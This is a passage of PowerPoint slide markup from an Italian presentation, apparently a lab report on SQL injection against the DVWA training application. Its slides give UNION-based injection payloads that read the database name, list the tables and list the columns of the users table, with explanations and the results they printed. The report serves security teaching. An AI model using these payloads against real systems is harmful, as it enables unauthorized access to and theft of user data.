              <a:t> è arbitraria e viene utilizzata solo per soddisfare il numero di colonne richieste dalla query originale.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="410213" indent="-205106" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2660"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 2 Bold"/>
              </a:rPr>
              <a:t>database() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 2"/>
              </a:rPr>
              <a:t>è una funzione di MySQL che restituisce il nome del database attualmente in uso. Il risultato di questa funzione verrà restituito come risultato della seconda colonna della query di unione.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="410213" indent="-205106" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2660"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 2 Bold"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 2"/>
              </a:rPr>
              <a:t> è un commento in MySQL. Tutto ciò che segue # verrà ignorato dal parser SQL. In questo caso, viene utilizzato per commentare la parte rimanente della query originale, prevenendo errori di sintassi (non si genererà un errore per mancata chiusura del simbolo di escape ‘).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 15" id="15"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="428653" y="3490094"/>
            <a:ext cx="9242180" cy="379730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3219"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2299">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="TT Autonomous Mono Bold"/>
              </a:rPr>
              <a:t>‘ UNION SELECT 1, database()#</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 16" id="16"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="428653" y="4508405"/>
            <a:ext cx="9242180" cy="779780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3219"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2299">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="TT Autonomous Mono Bold"/>
              </a:rPr>
              <a:t>SELECT first_name, last_name FROM users WHERE user_id = “ ‘ UNION SELECT 1, database()# “</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 17" id="17"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="8378925" y="8613680"/>
            <a:ext cx="9242180" cy="860425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3499"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2499">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 2"/>
              </a:rPr>
              <a:t> Il comando stampa a video il First name  1 e nel Surname il nome del database: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2499">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 2 Bold"/>
              </a:rPr>
              <a:t>“dvwa”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 18" id="18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-870120" y="638080"/>
            <a:ext cx="4369456"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19171" y="6021991"/>
            <a:ext cx="7472928" cy="6931140"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="6931140" w="7472928">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7472928" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7472928" y="6931140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6931140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 3" id="3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-5400000">
            <a:off x="2943662" y="-27432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0800000">
            <a:off x="4527621" y="4468854"/>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400000">
            <a:off x="13928287" y="2849604"/>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10800000">
            <a:off x="14134873" y="-1563445"/>
            <a:ext cx="5414402" cy="5184290"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="5184290" w="5414402">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5414401" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5414401" y="5184290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5184290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 7" id="7"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1772259"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3.5 - STUDIO DEL DATABASE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 8" id="8"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="true"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="963818" y="57366"/>
            <a:ext cx="7483269" cy="10369787"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="4734560" cy="6560820"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 9" id="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0" id="1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1" id="1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2" id="1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3" id="1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4" id="1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5" id="1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6" id="1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7" id="1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8" id="1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9144000" y="3214321"/>
            <a:ext cx="8948906" cy="2509067"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2509067" w="8948906">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8948906" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8948906" y="2509066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2509066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="-36237" t="-131379" r="0" b="-133964"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 22" id="22"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="5750834">
            <a:off x="11995925" y="5343072"/>
            <a:ext cx="1573853" cy="1518768"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 23" id="23"/>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5" id="25"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="405079" y="2017663"/>
            <a:ext cx="8419984" cy="7552291"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2520"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Ottenuto il nome del DB, si può riutilizzare una Query SELECT con operatore UNION per estrarre il nome delle tabelle presenti nel Database. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2520"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>In questo caso la Query sarà più specifica, in modo tale da recuperare le informazioni interessate in maniera precisa. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2520"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3079"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2199">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="TT Autonomous Mono Bold"/>
              </a:rPr>
              <a:t>‘ UNION SELECT 1, table_name FROM information_schema.tables WHERE table_schema = ‘dvwa’ #</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2520"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="388620" indent="-194310" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2520"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Table_name:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> restituirà i nomi delle tabelle.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="388620" indent="-194310" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2520"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>FROM: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Operatore che andrà a prendere le dalla funzione che viene inserita di seguito</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="388620" indent="-194310" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2520"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Information_schema.tables: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>fornisce informazioni riguardo la struttura del database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="388620" indent="-194310" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2520"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>WHERE: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>operatore che</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>va a precisare dove si trova cioè che si sta cercando.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="388620" indent="-194310" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2520"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>table_schema = ‘dvwa’: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>variabile che specifica all’operatore WHERE di andare a cercare nel database denominato ‘dvwa’. Il carattere # viene utilizzato commentare la parte rimanente della query originale, prevenendo errori di sintassi.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2843"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2843"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2843"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 26" id="26"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="10039383" y="6916779"/>
            <a:ext cx="8248617" cy="1489698"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3990"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2850">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Il comando stampa a video il First name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2850">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> 1 e in Surname il nome delle due tabelle presenti nel database:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2850">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2850">
                <a:solidFill>
                  <a:srgbClr val="DC0000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>guestbook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2850">
                <a:solidFill>
                  <a:srgbClr val="DC0000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2850">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2850">
                <a:solidFill>
                  <a:srgbClr val="DC0000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2850">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>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19171" y="6021991"/>
            <a:ext cx="7472928" cy="6931140"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="6931140" w="7472928">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7472928" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7472928" y="6931140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6931140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 3" id="3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-5400000">
            <a:off x="2943662" y="-27432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5400000">
            <a:off x="13928287" y="2849604"/>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10800000">
            <a:off x="4527621" y="4468854"/>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10800000">
            <a:off x="14134873" y="-1563445"/>
            <a:ext cx="5414402" cy="5184290"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="5184290" w="5414402">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5414401" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5414401" y="5184290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5184290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 7" id="7"/>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8" id="8"/>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9" id="9"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1611855"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3.5 - STUDIO DEL DATABASE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 10" id="10"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="true"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="407564" y="-554772"/>
            <a:ext cx="8550598" cy="11848817"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="4734560" cy="6560820"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 11" id="11"/>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2" id="12"/>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3" id="13"/>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4" id="14"/>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5" id="15"/>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6" id="16"/>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7" id="17"/>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8" id="18"/>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9" id="19"/>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1" id="21"/>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TextBox 22" id="22"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="700016" y="1651015"/>
            <a:ext cx="8719209" cy="7972279"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2877"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2055">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>A questo punto ci concentriamo sulla tabella users perché è quella </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2055">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>che molto probabilmente contiene dati sensibili relativi agli utenti. Utilizziamo quindi una query che recupera le colonne presenti nella tabella user:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3087"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2205">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="TT Autonomous Mono Bold"/>
              </a:rPr>
              <a:t>’ UNION SELECT 1, column</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2205">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="TT Autonomous Mono Bold"/>
              </a:rPr>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2205">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="TT Autonomous Mono Bold"/>
              </a:rPr>
              <a:t>name FROM information_schema.columns WHERE table_name = ‘users’#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2877"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="443724" indent="-221862" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2877"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2055">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>column_name: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2055">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>è il nome della colonna specifica che vogliamo selezionare dalla tabella information_schema.columns.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="443724" indent="-221862" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2877"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2055">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 2 Semi-Bold"/>
              </a:rPr>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2055">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 2"/>
              </a:rPr>
              <a:t>: è una tabella di sistema in MySQL che contiene informazioni su tutte le colonne di tutte le tabelle nel database. Stiamo accedendo a questa tabella per ottenere i nomi delle colonne.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="443724" indent="-221862" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2877"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2055">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 2 Bold"/>
              </a:rPr>
              <a:t>table_name = 'users'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2055">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 2"/>
              </a:rPr>
              <a:t>: filtro limita i risultati solo alle colonne che appartengono alla tabella users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2877"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2877"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3228"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2305">
